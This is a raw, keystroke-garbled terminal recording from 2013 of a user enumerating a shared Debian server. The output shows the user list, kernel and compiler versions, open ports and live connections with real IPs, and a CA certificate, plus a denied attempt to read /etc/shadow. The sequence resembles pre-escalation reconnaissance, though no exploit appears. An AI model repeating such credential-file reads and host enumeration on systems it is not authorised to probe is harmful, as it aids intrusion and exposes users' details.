Script started on Wed 09 Jan 2013 09:44:12 PM EST This is the Z Shell configuration function for new users, zsh-newuser-install. You are seeing this message because you have no zsh startup files (the files .zshenv, .zprofile, .zshrc, .zlogin in the directory ~). This function can help you with a few settings that should make your use of the shell easier. You can: (q) Quit and do nothing. The function will be run again next time. (0) Exit, creating the file ~/.zshrc containing just a comment. That will prevent this function being run again. (1) Continue to the main menu. (2) Populate your ~/.zshrc with the configuration recommended by the system administrator and exit (you will need to edit the file by hand, if so desired). --- Type one of the keys in parentheses --- Aborting. The function will be run again next time. To prevent this, execute: touch ~/.zshrc % magnesium% pps aux | grep ssh zsh: permission denied: ps % magnesium% lls > hello % magnesium% lls hello % magnesium% rrm hello % magnesium% lls % magnesium% lls % magnesium% lls -la total 68 drwxr-xr-x 2 mmaton mmaton 4096 Jan 9 21:44 . drwxr-xr-x 36 root root 4096 Jan 9 21:20 .. -rw------- 1 mmaton mmaton 16 Jan 9 21:42 .bash_history -rw-r--r-- 1 mmaton mmaton 220 Jan 9 21:20 .bash_logout -rw-r--r-- 1 mmaton mmaton 3544 Jan 9 21:43 .bashrc -rw-r--r-- 1 mmaton mmaton 675 Jan 9 21:20 .profile -rw------- 1 mmaton mmaton 33960 Jan 9 21:44 .zcompdump -rw------- 1 mmaton mmaton 5 Jan 9 21:44 .zsh_history -rw------- 1 mmaton mmaton 1295 Jan 9 21:44 .zshrc % magnesium% ccat .bash_history   id exit id exit % magnesium% cat .bash_history id exit id exit % magnesium% cat .bash_history id exit id exit % magnesium% cat .bash_history id exit id exit % magnesium% cat .bash_history id exit id exit % magnesium% uuname 0a uname: extra operand `0a' Try `uname --help' for more information. % magnesium% uuname -a Linux magnesium 3.2.0-4-686-pae #1 SMP Debian 3.2.32-1 i686 GNU/Linux % magnesium% ccat /etc.p  /passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh Debian-exim:x:101:103::/var/spool/exim4:/bin/false statd:x:102:65534::/var/lib/nfs:/bin/false sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin ryan:x:1000:1000:ryan,,,:/home/ryan:/bin/bash starfall:x:1001:1001:,,,:/home/starfall:/bin/bash StarZ:x:1002:1002:,,,:/home/StarZ:/bin/bash sevex:x:1003:1003:,,,:/home/sevex:/bin/bash puli1337:x:1004:1004:,,,:/home/puli1337:/bin/bash ielement:x:1005:1005:,,,:/home/ielement:/bin/bash venuism:x:1007:1007:,,,:/home/venuism:/bin/bash robby:x:1008:1008:,,,:/home/robby:/bin/bash renyan:x:1009:1009:,,,:/home/renyan:/bin/bash phizo:x:1010:1010:,,,:/home/phizo:/bin/bash ajvpot:x:1011:1011:,,,:/home/ajvpot:/bin/bash dwaan:x:1012:1012:,,,:/home/dwaan:/bin/bash kate:x:1013:1013:,,,:/home/kate:/bin/bash goku:x:1014:1014:,,,:/home/goku:/bin/bash affine:x:1015:1015:,,,:/home/affine:/bin/bash debian-tor:x:104:107::/var/lib/tor:/bin/false notroot:x:1016:1016:,,,:/home/notroot:/bin/bash shiro:x:1017:1017:,,,:/home/shiro:/bin/bash pseudomorphine:x:1018:1018:,,,:/home/pseudomorphine:/bin/bash vpn_test:x:1019:100::/:/bin/false vpn_phizo:x:1020:100::/:/bin/false vpn_ryan:x:1021:100::/:/bin/false vpn_Rozyn:x:1022:100::/:/bin/false hr:x:1023:1019:,,,:/home/hr:/bin/bash agentj:x:1024:1020:,,,:/home/agentj:/bin/bash vpn_snoods:x:1025:100::/:/bin/false vpn_mahdy:x:1026:100::/:/bin/false vpn_impuhlsive:x:1027:100::/:/bin/false sirenfal:x:1028:1021:,,,:/home/sirenfal:/bin/bash vpn_sirenfal:x:1029:100::/:/bin/false vpn_shiro:x:1030:100::/:/bin/false vpn_gravy:x:1031:100::/:/bin/false rcv:x:1032:1022:,,,:/home/rcv:/bin/bash rz:x:1033:1023:,,,:/home/rz:/bin/bash vpn_tradezomg:x:1034:100::/:/bin/false gurhush:x:1035:1024:,,,:/home/gurhush:/bin/bash valcorb:x:1036:1025:,,,:/home/valcorb:/bin/bash messagebus:x:105:110::/var/run/dbus:/bin/false colord:x:106:111:colord colour management daemon,,,:/var/lib/colord:/bin/false saned:x:107:112::/home/saned:/bin/false mlt:x:1006:1006:,,,:/home/mlt:/bin/bash bitlbee:x:108:113::/var/lib/bitlbee/:/bin/false icecast2:x:109:114::/usr/share/icecast2:/bin/false asdafs:x:1037:1026:,,,:/home/asdafs:/bin/bash vpn_chowder:x:1038:100::/:/bin/false vpn_daring:x:1039:100::/:/bin/false vpn_hawaii:x:1040:100::/:/bin/false tmp:x:1041:1027:,,,:/home/tmp:/bin/bash mountain:x:1042:1028:,,,:/home/mountain:/bin/bash r3m:x:1043:1029:,,,:/home/r3m:/bin/bash n0b0dy:x:1044:1030:,,,:/home/n0b0dy:/bin/bash ejabberd:x:110:115::/var/lib/ejabberd:/bin/sh prosody:x:111:117:Prosody XMPP Server,,,:/var/lib/prosody:/bin/false apple:x:1045:1031:,,,:/home/apple:/bin/false vpn_generic:x:1046:100::/:/bin/false mmaton:x:1047:1032:,,,:/home/mmaton:/bin/bash % magnesium%  magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% magnesium% ppythin  on -v # installing zipimport hook import zipimport # builtin # installed zipimport hook # /usr/lib/python2.7/site.pyc matches /usr/lib/python2.7/site.py import site # precompiled from /usr/lib/python2.7/site.pyc # /usr/lib/python2.7/os.pyc matches /usr/lib/python2.7/os.py import os # precompiled from /usr/lib/python2.7/os.pyc import errno # builtin import posix # builtin # /usr/lib/python2.7/posixpath.pyc matches /usr/lib/python2.7/posixpath.py import posixpath # precompiled from /usr/lib/python2.7/posixpath.pyc # /usr/lib/python2.7/stat.pyc matches /usr/lib/python2.7/stat.py import stat # precompiled from /usr/lib/python2.7/stat.pyc # /usr/lib/python2.7/genericpath.pyc matches /usr/lib/python2.7/genericpath.py import genericpath # precompiled from /usr/lib/python2.7/genericpath.pyc # /usr/lib/python2.7/warnings.pyc matches /usr/lib/python2.7/warnings.py import warnings # precompiled from /usr/lib/python2.7/warnings.pyc # /usr/lib/python2.7/linecache.pyc matches /usr/lib/python2.7/linecache.py import linecache # precompiled from /usr/lib/python2.7/linecache.pyc # /usr/lib/python2.7/types.pyc matches /usr/lib/python2.7/types.py import types # precompiled from /usr/lib/python2.7/types.pyc # /usr/lib/python2.7/UserDict.pyc matches /usr/lib/python2.7/UserDict.py import UserDict # precompiled from /usr/lib/python2.7/UserDict.pyc # /usr/lib/python2.7/_abcoll.pyc matches /usr/lib/python2.7/_abcoll.py import _abcoll # precompiled from /usr/lib/python2.7/_abcoll.pyc # /usr/lib/python2.7/abc.pyc matches /usr/lib/python2.7/abc.py import abc # precompiled from /usr/lib/python2.7/abc.pyc # /usr/lib/python2.7/_weakrefset.pyc matches /usr/lib/python2.7/_weakrefset.py import _weakrefset # precompiled from /usr/lib/python2.7/_weakrefset.pyc import _weakref # builtin # /usr/lib/python2.7/copy_reg.pyc matches /usr/lib/python2.7/copy_reg.py import copy_reg # precompiled from /usr/lib/python2.7/copy_reg.pyc # /usr/lib/python2.7/traceback.pyc matches /usr/lib/python2.7/traceback.py import traceback # precompiled from /usr/lib/python2.7/traceback.pyc # /usr/lib/python2.7/sysconfig.pyc matches /usr/lib/python2.7/sysconfig.py import sysconfig # precompiled from /usr/lib/python2.7/sysconfig.pyc # /usr/lib/python2.7/re.pyc matches /usr/lib/python2.7/re.py import re # precompiled from /usr/lib/python2.7/re.pyc # /usr/lib/python2.7/sre_compile.pyc matches /usr/lib/python2.7/sre_compile.py import sre_compile # precompiled from /usr/lib/python2.7/sre_compile.pyc import _sre # builtin # /usr/lib/python2.7/sre_parse.pyc matches /usr/lib/python2.7/sre_parse.py import sre_parse # precompiled from /usr/lib/python2.7/sre_parse.pyc # /usr/lib/python2.7/sre_constants.pyc matches /usr/lib/python2.7/sre_constants.py import sre_constants # precompiled from /usr/lib/python2.7/sre_constants.pyc # /usr/lib/python2.7/_sysconfigdata.pyc matches /usr/lib/python2.7/_sysconfigdata.py import _sysconfigdata # precompiled from /usr/lib/python2.7/_sysconfigdata.pyc # /usr/lib/python2.7/_sysconfigdata_nd.pyc matches /usr/lib/python2.7/_sysconfigdata_nd.py import _sysconfigdata_nd # precompiled from /usr/lib/python2.7/_sysconfigdata_nd.pyc # /usr/lib/python2.7/sitecustomize.pyc matches /usr/lib/python2.7/sitecustomize.py import sitecustomize # precompiled from /usr/lib/python2.7/sitecustomize.pyc import encodings # directory /usr/lib/python2.7/encodings # /usr/lib/python2.7/encodings/__init__.pyc matches /usr/lib/python2.7/encodings/__init__.py import encodings # precompiled from /usr/lib/python2.7/encodings/__init__.pyc # /usr/lib/python2.7/codecs.pyc matches /usr/lib/python2.7/codecs.py import codecs # precompiled from /usr/lib/python2.7/codecs.pyc import _codecs # builtin # /usr/lib/python2.7/encodings/aliases.pyc matches /usr/lib/python2.7/encodings/aliases.py import encodings.aliases # precompiled from /usr/lib/python2.7/encodings/aliases.pyc # /usr/lib/python2.7/encodings/utf_8.pyc matches /usr/lib/python2.7/encodings/utf_8.py import encodings.utf_8 # precompiled from /usr/lib/python2.7/encodings/utf_8.pyc Python 2.7.3 (default, Sep 10 2012, 00:09:03) [GCC 4.7.1] on linux2 Type "help", "copyright", "credits" or "license" for more information. dlopen("/usr/lib/python2.7/lib-dynload/readline.so", 2); import readline # dynamically loaded from /usr/lib/python2.7/lib-dynload/readline.so >>> >>> KeyboardInterrupt >>> KeyboardInterrupt >>> KeyboardInterrupt >>> exiexit() # clear __builtin__._ # clear sys.path # clear sys.argv # clear sys.ps1 # clear sys.ps2 # clear sys.exitfunc # clear sys.exc_type # clear sys.exc_value # clear sys.exc_traceback # clear sys.last_type # clear sys.last_value # clear sys.last_traceback # clear sys.path_hooks # clear sys.path_importer_cache # clear sys.meta_path # clear sys.flags # clear sys.float_info # restore sys.stdin # restore sys.stdout # restore sys.stderr # cleanup __main__ # cleanup[1] encodings # cleanup[1] site # cleanup[1] sysconfig # cleanup[1] abc # cleanup[1] _weakrefset # cleanup[1] sre_constants # cleanup[1] re # cleanup[1] _codecs # cleanup[1] _warnings # cleanup[1] zipimport # cleanup[1] _sysconfigdata # cleanup[1] encodings.utf_8 # cleanup[1] codecs # cleanup[1] readline # cleanup[1] _sysconfigdata_nd # cleanup[1] sitecustomize # cleanup[1] signal # cleanup[1] traceback # cleanup[1] posix # cleanup[1] encodings.aliases # cleanup[1] exceptions # cleanup[1] _weakref # cleanup[1] sre_compile # cleanup[1] _sre # cleanup[1] sre_parse # cleanup[2] copy_reg # cleanup[2] posixpath # cleanup[2] errno # cleanup[2] _abcoll # cleanup[2] types # cleanup[2] genericpath # cleanup[2] stat # cleanup[2] warnings # cleanup[2] UserDict # cleanup[2] os.path # cleanup[2] linecache # cleanup[2] os # cleanup sys # cleanup __builtin__ # cleanup ints: 18 unfreed ints # cleanup floats % magnesium% ccat .e  /etc/a passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh Debian-exim:x:101:103::/var/spool/exim4:/bin/false statd:x:102:65534::/var/lib/nfs:/bin/false sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin ryan:x:1000:1000:ryan,,,:/home/ryan:/bin/bash starfall:x:1001:1001:,,,:/home/starfall:/bin/bash StarZ:x:1002:1002:,,,:/home/StarZ:/bin/bash sevex:x:1003:1003:,,,:/home/sevex:/bin/bash puli1337:x:1004:1004:,,,:/home/puli1337:/bin/bash ielement:x:1005:1005:,,,:/home/ielement:/bin/bash venuism:x:1007:1007:,,,:/home/venuism:/bin/bash robby:x:1008:1008:,,,:/home/robby:/bin/bash renyan:x:1009:1009:,,,:/home/renyan:/bin/bash phizo:x:1010:1010:,,,:/home/phizo:/bin/bash ajvpot:x:1011:1011:,,,:/home/ajvpot:/bin/bash dwaan:x:1012:1012:,,,:/home/dwaan:/bin/bash kate:x:1013:1013:,,,:/home/kate:/bin/bash goku:x:1014:1014:,,,:/home/goku:/bin/bash affine:x:1015:1015:,,,:/home/affine:/bin/bash debian-tor:x:104:107::/var/lib/tor:/bin/false notroot:x:1016:1016:,,,:/home/notroot:/bin/bash shiro:x:1017:1017:,,,:/home/shiro:/bin/bash pseudomorphine:x:1018:1018:,,,:/home/pseudomorphine:/bin/bash vpn_test:x:1019:100::/:/bin/false vpn_phizo:x:1020:100::/:/bin/false vpn_ryan:x:1021:100::/:/bin/false vpn_Rozyn:x:1022:100::/:/bin/false hr:x:1023:1019:,,,:/home/hr:/bin/bash agentj:x:1024:1020:,,,:/home/agentj:/bin/bash vpn_snoods:x:1025:100::/:/bin/false vpn_mahdy:x:1026:100::/:/bin/false vpn_impuhlsive:x:1027:100::/:/bin/false sirenfal:x:1028:1021:,,,:/home/sirenfal:/bin/bash vpn_sirenfal:x:1029:100::/:/bin/false vpn_shiro:x:1030:100::/:/bin/false vpn_gravy:x:1031:100::/:/bin/false rcv:x:1032:1022:,,,:/home/rcv:/bin/bash rz:x:1033:1023:,,,:/home/rz:/bin/bash vpn_tradezomg:x:1034:100::/:/bin/false gurhush:x:1035:1024:,,,:/home/gurhush:/bin/bash valcorb:x:1036:1025:,,,:/home/valcorb:/bin/bash messagebus:x:105:110::/var/run/dbus:/bin/false colord:x:106:111:colord colour management daemon,,,:/var/lib/colord:/bin/false saned:x:107:112::/home/saned:/bin/false mlt:x:1006:1006:,,,:/home/mlt:/bin/bash bitlbee:x:108:113::/var/lib/bitlbee/:/bin/false icecast2:x:109:114::/usr/share/icecast2:/bin/false asdafs:x:1037:1026:,,,:/home/asdafs:/bin/bash vpn_chowder:x:1038:100::/:/bin/false vpn_daring:x:1039:100::/:/bin/false vpn_hawaii:x:1040:100::/:/bin/false tmp:x:1041:1027:,,,:/home/tmp:/bin/bash mountain:x:1042:1028:,,,:/home/mountain:/bin/bash r3m:x:1043:1029:,,,:/home/r3m:/bin/bash n0b0dy:x:1044:1030:,,,:/home/n0b0dy:/bin/bash ejabberd:x:110:115::/var/lib/ejabberd:/bin/sh prosody:x:111:117:Prosody XMPP Server,,,:/var/lib/prosody:/bin/false apple:x:1045:1031:,,,:/home/apple:/bin/false vpn_generic:x:1046:100::/:/bin/false mmaton:x:1047:1032:,,,:/home/mmaton:/bin/bash % magnesium% cat /etc/passwd      shadow cat: /etc/shadow: Permission denied % magnesium% pps zsh: permission denied: ps % magnesium% llocate locate: no pattern to search for specified % magnesium% ccd /usr// bin/ games/ include/ lib/ local/ sbin/ share/ src/ cd /usr/bin/games/include/lib/  ocal/sbin/ hare/rc/  bin         c  uuname -a Linux magnesium 3.2.0-4-686-pae #1 SMP Debian 3.2.32-1 i686 GNU/Linux % magnesium% nnetstat -an Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 0.0.0.0:5269 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:8089 0.0.0.0:* LISTEN tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN tcp 0 0 127.0.0.1:6010 0.0.0.0:* LISTEN tcp 0 0 127.0.0.1:9050 0.0.0.0:* LISTEN tcp 0 0 127.0.0.1:6011 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:8734 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:8000 0.0.0.0:* LISTEN tcp 0 0 127.0.0.1:5347 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:5222 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:32331 0.0.0.0:* LISTEN tcp 0 0 199.229.249.189:36309 91.121.0.144:6667 ESTABLISHED tcp 0 0 199.229.249.189:22 50.16.13.14:57930 ESTABLISHED tcp 0 0 199.229.249.189:22 72.179.167.3:14126 ESTABLISHED tcp 0 0 199.229.249.189:22 88.114.211.190:47114 ESTABLISHED tcp 0 0 199.229.249.189:52842 67.43.228.244:6667 ESTABLISHED tcp 0 0 199.229.249.189:34145 208.99.88.245:6667 ESTABLISHED tcp 0 0 199.229.249.189:54802 176.31.103.103:6667 ESTABLISHED tcp 0 0 199.229.249.189:22 72.179.167.3:7536 ESTABLISHED tcp 0 0 199.229.249.189:22 50.16.13.14:54887 ESTABLISHED tcp 0 0 199.229.249.189:34700 83.169.14.133:6667 ESTABLISHED tcp 0 0 199.229.249.189:60689 93.190.68.48:6667 ESTABLISHED tcp 0 0 199.229.249.189:22 88.114.211.190:48644 ESTABLISHED tcp 0 0 199.229.249.189:54497 69.42.211.111:6667 ESTABLISHED tcp 0 0 199.229.249.190:22 199.254.238.146:52891 ESTABLISHED tcp 0 0 199.229.249.189:22 72.179.167.3:43390 ESTABLISHED tcp 0 0 199.229.249.189:22 50.16.13.14:52065 ESTABLISHED tcp 0 0 199.229.249.189:22 88.114.211.190:22866 ESTABLISHED tcp 0 4944 199.229.249.189:22 217.39.11.9:50764 ESTABLISHED tcp 0 0 199.229.249.189:48754 176.31.103.103:6667 ESTABLISHED tcp 0 0 199.229.249.189:48752 176.31.103.103:6667 ESTABLISHED tcp 0 0 199.229.249.189:58540 91.121.0.144:6667 ESTABLISHED tcp 0 0 199.229.249.190:22 199.254.238.146:56684 ESTABLISHED tcp 0 0 199.229.249.189:53070 67.43.228.182:6667 ESTABLISHED tcp 0 0 199.229.249.189:34097 109.236.88.191:33300 ESTABLISHED tcp6 0 0 :::22 :::* LISTEN tcp6 0 0 ::1:25 :::* LISTEN tcp6 0 0 ::1:6010 :::* LISTEN tcp6 0 0 ::1:6011 :::* LISTEN tcp6 0 0 :::443 :::* LISTEN tcp6 0 0 :::25565 :::* LISTEN tcp6 0 0 :::6666 :::* LISTEN udp 0 0 199.229.249.189:53 0.0.0.0:* udp 0 0 199.229.249.189:1194 0.0.0.0:* udp 0 0 0.0.0.0:1900 0.0.0.0:* Active UNIX domain sockets (servers and established) Proto RefCnt Flags Type State I-Node Path unix 2 [ ACC ] SEQPACKET LISTENING 3356 /run/udev/control unix 2 [ ACC ] STREAM LISTENING 5936 /var/run/dbus/system_bus_socket unix 2 [ ACC ] STREAM LISTENING 6284 /var/run/tor/control unix 27 [ ] DGRAM 5832 /dev/log unix 2 [ ACC ] STREAM LISTENING 6347 /var/run/minissdpd.sock unix 2 [ ACC ] STREAM LISTENING 5859 /var/run/acpid.socket unix 3 [ ] STREAM CONNECTED 4136303 unix 3 [ ] STREAM CONNECTED 4136302 unix 3 [ ] STREAM CONNECTED 4136227 /var/run/dbus/system_bus_socket unix 3 [ ] STREAM CONNECTED 4136226 unix 2 [ ] DGRAM 4136225 unix 2 [ ] DGRAM 4131415 unix 2 [ ] DGRAM 4131412 unix 2 [ ] STREAM CONNECTED 4047226 unix 2 [ ] STREAM CONNECTED 4047224 unix 2 [ ] STREAM CONNECTED 4047149 unix 2 [ ] STREAM CONNECTED 4047147 unix 3 [ ] STREAM CONNECTED 4029612 unix 3 [ ] STREAM CONNECTED 4029611 unix 3 [ ] STREAM CONNECTED 4029536 /var/run/dbus/system_bus_socket unix 3 [ ] STREAM CONNECTED 4029535 unix 2 [ ] DGRAM 4029534 unix 3 [ ] STREAM CONNECTED 4029497 unix 3 [ ] STREAM CONNECTED 4029496 unix 3 [ ] STREAM CONNECTED 4029421 /var/run/dbus/system_bus_socket unix 3 [ ] STREAM CONNECTED 4029420 unix 2 [ ] DGRAM 4029419 unix 3 [ ] STREAM CONNECTED 4015009 unix 3 [ ] STREAM CONNECTED 4015008 unix 3 [ ] STREAM CONNECTED 4014933 /var/run/dbus/system_bus_socket unix 3 [ ] STREAM CONNECTED 4014932 unix 2 [ ] DGRAM 4014931 unix 3 [ ] STREAM CONNECTED 3908087 unix 3 [ ] STREAM CONNECTED 3908086 unix 3 [ ] STREAM CONNECTED 3908011 /var/run/dbus/system_bus_socket unix 3 [ ] STREAM CONNECTED 3908010 unix 2 [ ] DGRAM 3908009 unix 3 [ ] STREAM CONNECTED 3900577 unix 3 [ ] STREAM CONNECTED 3900576 unix 3 [ ] STREAM CONNECTED 3900501 /var/run/dbus/system_bus_socket unix 3 [ ] STREAM CONNECTED 3900500 unix 2 [ ] DGRAM 3900499 unix 3 [ ] STREAM CONNECTED 3834028 unix 3 [ ] STREAM CONNECTED 3834027 unix 3 [ ] STREAM CONNECTED 3833952 /var/run/dbus/system_bus_socket unix 3 [ ] STREAM CONNECTED 3833951 unix 2 [ ] DGRAM 3833950 unix 2 [ ] DGRAM 3832835 unix 2 [ ] DGRAM 3832832 unix 3 [ ] STREAM CONNECTED 3832751 unix 3 [ ] STREAM CONNECTED 3832750 unix 3 [ ] STREAM CONNECTED 3832675 /var/run/dbus/system_bus_socket unix 3 [ ] STREAM CONNECTED 3832674 unix 2 [ ] DGRAM 3832673 unix 3 [ ] STREAM CONNECTED 3726928 /var/run/dbus/system_bus_socket unix 3 [ ] STREAM CONNECTED 3726927 unix 2 [ ] DGRAM 3726924 unix 2 [ ] DGRAM 3726911 unix 2 [ ] DGRAM 3726908 unix 3 [ ] STREAM CONNECTED 3726822 unix 3 [ ] STREAM CONNECTED 3726821 unix 3 [ ] STREAM CONNECTED 3726746 /var/run/dbus/system_bus_socket unix 3 [ ] STREAM CONNECTED 3726745 unix 2 [ ] DGRAM 3726744 unix 3 [ ] STREAM CONNECTED 3642241 unix 3 [ ] STREAM CONNECTED 3642240 unix 3 [ ] STREAM CONNECTED 3642165 /var/run/dbus/system_bus_socket unix 3 [ ] STREAM CONNECTED 3642164 unix 2 [ ] DGRAM 3642163 unix 3 [ ] STREAM CONNECTED 3496977 unix 3 [ ] STREAM CONNECTED 3496976 unix 3 [ ] STREAM CONNECTED 3496975 unix 3 [ ] STREAM CONNECTED 3496974 unix 3 [ ] STREAM CONNECTED 1377745 unix 3 [ ] STREAM CONNECTED 1377744 unix 3 [ ] STREAM CONNECTED 1377669 /var/run/dbus/system_bus_socket unix 3 [ ] STREAM CONNECTED 1377668 unix 2 [ ] DGRAM 1377667 unix 3 [ ] STREAM CONNECTED 1327925 /var/run/dbus/system_bus_socket unix 3 [ ] STREAM CONNECTED 1327924 unix 2 [ ] DGRAM 1327921 unix 2 [ ] DGRAM 1327908 unix 2 [ ] DGRAM 1327905 unix 3 [ ] STREAM CONNECTED 1327822 unix 3 [ ] STREAM CONNECTED 1327821 unix 3 [ ] STREAM CONNECTED 1327746 /var/run/dbus/system_bus_socket unix 3 [ ] STREAM CONNECTED 1327745 unix 2 [ ] DGRAM 1327744 unix 3 [ ] DGRAM 1315583 unix 3 [ ] DGRAM 1315582 unix 2 [ ] DGRAM 1315579 unix 2 [ ] STREAM CONNECTED 684349 unix 2 [ ] STREAM CONNECTED 684242 unix 2 [ ] DGRAM 121284 unix 2 [ ] DGRAM 8678 unix 3 [ ] STREAM CONNECTED 6720 /var/run/dbus/system_bus_socket unix 3 [ ] STREAM CONNECTED 6719 unix 3 [ ] STREAM CONNECTED 6710 /var/run/dbus/system_bus_socket unix 3 [ ] STREAM CONNECTED 6709 unix 3 [ ] STREAM CONNECTED 6687 /var/run/dbus/system_bus_socket unix 3 [ ] STREAM CONNECTED 6686 unix 2 [ ] DGRAM 6676 unix 3 [ ] DGRAM 6378 unix 3 [ ] DGRAM 6377 unix 2 [ ] DGRAM 6374 unix 3 [ ] STREAM CONNECTED 6280 unix 3 [ ] STREAM CONNECTED 6279 unix 2 [ ] DGRAM 6236 unix 3 [ ] STREAM CONNECTED 5940 unix 3 [ ] STREAM CONNECTED 5939 unix 3 [ ] STREAM CONNECTED 5888 unix 3 [ ] STREAM CONNECTED 5887 unix 2 [ ] DGRAM 5856 unix 3 [ ] DGRAM 3363 unix 3 [ ] DGRAM 3362 % magnesium% ggcc -v Using built-in specs. COLLECT_GCC=gcc COLLECT_LTO_WRAPPER=/usr/lib/gcc/i486-linux-gnu/4.7/lto-wrapper Target: i486-linux-gnu Configured with: ../src/configure -v --with-pkgversion='Debian 4.7.2-4' --with-bugurl=file:///usr/share/doc/gcc-4.7/README.Bugs --enable-languages=c,c++,go,fortran,objc,obj-c++ --prefix=/usr --program-suffix=-4.7 --enable-shared --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.7 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --enable-plugin --enable-objc-gc --enable-targets=all --with-arch-32=i586 --with-tune=generic --enable-checking=release --build=i486-linux-gnu --host=i486-linux-gnu --target=i486-linux-gnu Thread model: posix gcc version 4.7.2 (Debian 4.7.2-4) % magnesium% lls % magnesium% ccd . % magnesium% ccd / % magnesium% lls bin ca.crt etc initrd.img lib media openvpn.conf proc run selinux sys usr vmlinuz boot dev home initrd.img.old lost+found mnt opt root sbin srv tmp var vmlinuz.old % magnesium% ccat ca.crt -----BEGIN CERTIFICATE----- MIIEejCCA2KgAwIBAgIJAOEj4wI9UzKTMA0GCSqGSIb3DQEBBQUAMIGEMQswCQYD VQQGEwJVUzELMAkGA1UECBMCQ0ExDDAKBgNVBAcTA0xPTDEMMAoGA1UEChMDTE9M MQwwCgYDVQQLEwNsb2wxDDAKBgNVBAMTA2xvbDEMMAoGA1UEKRMDbG9sMSIwIAYJ KoZIhvcNAQkBFhNzdGFyZmFsbEByaXNldXAubmV0MB4XDTEyMTEyNjA0MTQxMFoX DTIyMTEyNDA0MTQxMFowgYQxCzAJBgNVBAYTAlVTMQswCQYDVQQIEwJDQTEMMAoG A1UEBxMDTE9MMQwwCgYDVQQKEwNMT0wxDDAKBgNVBAsTA2xvbDEMMAoGA1UEAxMD bG9sMQwwCgYDVQQpEwNsb2wxIjAgBgkqhkiG9w0BCQEWE3N0YXJmYWxsQHJpc2V1 cC5uZXQwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCgstS9rflLEnb7 tKw2HCJa8CtsMBrxXEL3G1yz7R+Ecqpfat4C8xeg8IIc41gaOOUEto7qixEyh0VC NpsFmNl2cgD0tia/adYKC5cQ7ov+JuEGxl6FW6MxU1Tl6YGkn3f8wNqkN0/q1QCE X0hgutbXGvZzMYWoGeJCI6ql81MVjKQ7txJLvl6S4RnzJ4T6rS30kq8QmfTMq2i0 AhrUkryG9K6V0EHXol5TsgQO2ymdDsrgpbFjYQ8foY9a7crXudCEAi3UqxwE/NTe w+c9+8Wm14F+uYXLQlTw6a/tZlykB2ECTfZx+zlGXCq+eksvng0gd6ancZNIM/uZ cDEwdtJ1AgMBAAGjgewwgekwHQYDVR0OBBYEFLK3/1XKI5tP7MUt0Qavtfh073Ge MIG5BgNVHSMEgbEwga6AFLK3/1XKI5tP7MUt0Qavtfh073GeoYGKpIGHMIGEMQsw CQYDVQQGEwJVUzELMAkGA1UECBMCQ0ExDDAKBgNVBAcTA0xPTDEMMAoGA1UEChMD TE9MMQwwCgYDVQQLEwNsb2wxDDAKBgNVBAMTA2xvbDEMMAoGA1UEKRMDbG9sMSIw IAYJKoZIhvcNAQkBFhNzdGFyZmFsbEByaXNldXAubmV0ggkA4SPjAj1TMpMwDAYD VR0TBAUwAwEB/zANBgkqhkiG9w0BAQUFAAOCAQEAlQ/uO1msqHz8js/bNxVuxvBc 8gnCTP6PrbpMsbutaaeG5NIz9oy9KXgGCnS8VFwOjzfjDXjg/l//RLgugX8XDLRl 